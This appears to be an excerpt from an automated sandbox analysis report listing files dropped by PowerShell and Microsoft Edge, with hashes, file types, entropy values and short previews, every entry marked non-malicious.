                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1371
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529436301618216
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtLkMbFPB6Fr6yik9JdXBuBuwBFayPnNhR+XcQQQRCYfYg:YuBqDPafWMbFPTUgBzBFDPzR+sFB0
                                                                                                                                                                                                                                                                                                              MD5:B15A20CBDC1E4DAC9EABEB4E7F63F840
                                                                                                                                                                                                                                                                                                              SHA1:1CA549A63831F0B1015A4F3100CBDD57BC194CC5
                                                                                                                                                                                                                                                                                                              SHA-256:B4A340E11B8DC9FA9EA5FD8EDDDEFF4FD9032551719764C2A82E40CF930BE91E
                                                                                                                                                                                                                                                                                                              SHA-512:93E14403555ECEA53E4B1263E7A416D63D65827ADD036381AE98D4222381FD7ADABB2514B555E855AEC244F694E5A3726BDC0EC073AB5D4702827D6D85672BC6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3281
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.590185824541608
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:0q8NkC1fWMbFPWQPcBGWsv7jOQ6Jk2ceSDS4S4SDSJI4a:/8Nb/bApTQ2k2x
                                                                                                                                                                                                                                                                                                              MD5:480EC7BB3DE7EA884E50AA5A26EE377F
                                                                                                                                                                                                                                                                                                              SHA1:B62CC0E5A73A3352F81D00A6B605B971994942CC
                                                                                                                                                                                                                                                                                                              SHA-256:0A5EFE1046EF3934F79B718C5D28C36F8E22A388F3ABCE718C9B413400E3A49C
                                                                                                                                                                                                                                                                                                              SHA-512:7A35F2AEAFAE5B38466C2AB32475BC1BABC65AE1B1B0BE0334145E745A43BA49031346DEA2CCD45A221B52FF61FA225860FB7D5B3FA46BE235047A99D1138475
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 512-0, spot sensor temperature 0.000000, unit celsius, color scheme 1, maximum point enabled, calibration: offset 0.000000, slope 2417851639229258349412352.000000
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.219830469972604
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:dmuOVzDPXYcQiqRGyWTfjkcRGg1DRFF7qSRGRRZp0z7:dmBV/PXYcjjZTfjkpg1HF7qb3Iz
                                                                                                                                                                                                                                                                                                              MD5:61A5C0C83495B5378C3748D23055F795
                                                                                                                                                                                                                                                                                                              SHA1:7AE585A993171D43C6889EA038A0412D05E69390
                                                                                                                                                                                                                                                                                                              SHA-256:CD8268A697250A3A579DF048BD321C28DFAC714F37095B9284003EB935DE6554
                                                                                                                                                                                                                                                                                                              SHA-512:9E7AAE29C69B90CA7AD9B7F307B65304A16B8198FA2E012F697EDF176072EDC39F4D7C9561FBEF7AC2DCF10289E6328FAF923B7A1C7953CE0146D853E91A9D09
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.7560310754779649
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlS7T7cSgwt/uB2RRR5NNWWQeKl//l:o1ucwt2gPvXKl
                                                                                                                                                                                                                                                                                                              MD5:E956145415A724D137B90EFF72B9DC2D
                                                                                                                                                                                                                                                                                                              SHA1:91166338BA03229FC5B2EE7F8277E6671CBDD443
                                                                                                                                                                                                                                                                                                              SHA-256:948EF76E909C0EA977B38155B920E6128C0FF60131334D4CE5181E4BEF6934B7
                                                                                                                                                                                                                                                                                                              SHA-512:20323D3538D9A9DFD835D94049B8069A046627136C32C40896C1C735310E060CE0464DD331E55BC3B41B364B9A53F997C91B33864F641B6895C765425C6BD280
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:sdPC....................x...%.yI..y.....................................................................................................................................................................................................92d09483-a0e9-4432-90a7-7c4d2e894f54............
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:level=none expiry=0.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):45056
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012760698469074051
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFlYhEtlGJllTxFKljNxftKln9n/1vEtDt:/FiEXGlcNxftY9NED
                                                                                                                                                                                                                                                                                                              MD5:C0AA5606C91FC2676D55D75172D92D4E
                                                                                                                                                                                                                                                                                                              SHA1:B1D7ED2260490A168A18B4FAE444C8CC01E47E0F
                                                                                                                                                                                                                                                                                                              SHA-256:E18D8CEB85C5065E558AAE142606CF3E209E046D655874A52B7F30A908302809
                                                                                                                                                                                                                                                                                                              SHA-512:D1959DC685A764752131A288BDC2318B68FDDB1FEE94EF483A8197003E0CDF1EE78BA3AF62123691CB4F53D3621A21CD6AA66DE4B24A1357CE22FB4B1D80351C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.02887548200261327
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:U/BEfnTrjXcdCIRrYfhbtZPC93OHjsqJm09MWPG:qKTrjsd/Rc1PCQHjTpM
                                                                                                                                                                                                                                                                                                              MD5:2D1B6280E1685E148119A542128D1275
                                                                                                                                                                                                                                                                                                              SHA1:A6FD3A398F73714E48D78003676267CB4AD867A1
                                                                                                                                                                                                                                                                                                              SHA-256:3765F7FA0E176F33BFE547AEA17BECB811805E607663EF427503E28BC654BBA0
                                                                                                                                                                                                                                                                                                              SHA-512:7B792D188FE511981A92A149937DF67293DB25A032D95AEEE77A0485659AEF347A5C1D77B7E104AF15A58190A3C462D34B462F69FB5A90785DC9326C48EF8469
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):524656
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsulLC4lt:Lsto
                                                                                                                                                                                                                                                                                                              MD5:D597ACD4CF507172695E6340309D8BDC
                                                                                                                                                                                                                                                                                                              SHA1:D5FE7C200AC9B4D9094F8EA9FA187A3E8EF84A45
                                                                                                                                                                                                                                                                                                              SHA-256:8F6B9859F0E1B77FB5CA38A5C36E2C058D3C5EE1F78E278F5D86AD5696C34512
                                                                                                                                                                                                                                                                                                              SHA-512:2C1E787AB9C9C4CD62F629A2C15F85D1F16007BB3C0A3654BB8A516D87CAE89A5BE6E88D3BB50A6F3B336225FB9BFE4D1E24C2A2BE3490FEC1CA6CA8490C89FC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:sEfE734:sEM7o
                                                                                                                                                                                                                                                                                                              MD5:3AF790F778B78820CB9E33FD85859F8A
                                                                                                                                                                                                                                                                                                              SHA1:56C39500428BCC7F0C37413BF1659AB577ED739D
                                                                                                                                                                                                                                                                                                              SHA-256:ECB88D3E551833CD4A0D081B194E947B699407D66F25D1618815B09B6D12E254
                                                                                                                                                                                                                                                                                                              SHA-512:F80A2B53B2A96F1B16288765000E1CB2DFC9313A2A1AD219B7498EA659E02EB5BD4EE6FC0E314EFF538034F506DB8C70A21EC674DF8823AD295C277C75065F80
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:(...q...oy retne........................'.#.z./.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:3RkdESeF+:z7+
                                                                                                                                                                                                                                                                                                              MD5:2B07AEC2296AC3A65FE975A641CA8DD6
                                                                                                                                                                                                                                                                                                              SHA1:FF6E7FCD48144495F367FD08DEC36E9E542B9188
                                                                                                                                                                                                                                                                                                              SHA-256:0C568256FA2C95D41F3A111C2C438146CA9C669A4200CA8B367E248D792C83F8
                                                                                                                                                                                                                                                                                                              SHA-512:1BFD062F07C79BE47DFB225961797CAC0FDA81BD75C00221B14CA52BA902A0D60044F87AA169EA237788D42DF1ED2983D97D19FE0E5F96AECB0C299C9B73CA18
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:(...j.UAoy retne.........................s#.z./.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNlCmtK//:Ls3CB/
                                                                                                                                                                                                                                                                                                              MD5:AACE01646779CAAE2B7C0AFF48824044
                                                                                                                                                                                                                                                                                                              SHA1:441BD11C95182A935A7D265D4D1357B96BF83E07
                                                                                                                                                                                                                                                                                                              SHA-256:45A2DF0CDA5F9ADAFAD490850C1BFD0E8553CC8F9225520F03CB573F119A0A46
                                                                                                                                                                                                                                                                                                              SHA-512:AAC930D00E5D5B3D52F1FA3BED44921AC75543FD5FC216FF11E362A04361230D0C66672BF6719717994C0B536D65EC778654C50E2FC286D5AECA7F4130AADE16
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.275105895836357
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kajR1923fQyS//G2tbB2KLlmaqc+q2P923fQyS//G2tMsIFUv:D8s9VFLF+v4s9GFUv
                                                                                                                                                                                                                                                                                                              MD5:DDBEF800BD9D4359FF6F84EB75D307EC
                                                                                                                                                                                                                                                                                                              SHA1:D2950F0F6949880977346E4A558EFF3FF48BF608
                                                                                                                                                                                                                                                                                                              SHA-256:0C3894B6DC4226D4F9B70227CAD2F71D06B92E4347EF93749EB7125D59E8B3C6
                                                                                                                                                                                                                                                                                                              SHA-512:8AAFBB5ABF87AC6EF7BA8BB809BF2ECF560B21D05777E759E21912AB2EECCACE2E5F26BD02024EDA941DBB8E09F93EC44C5BBE3CF9741B6C95DE4849B46BFF8A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.809 4dc Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/22-17:54:52.959 4dc Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
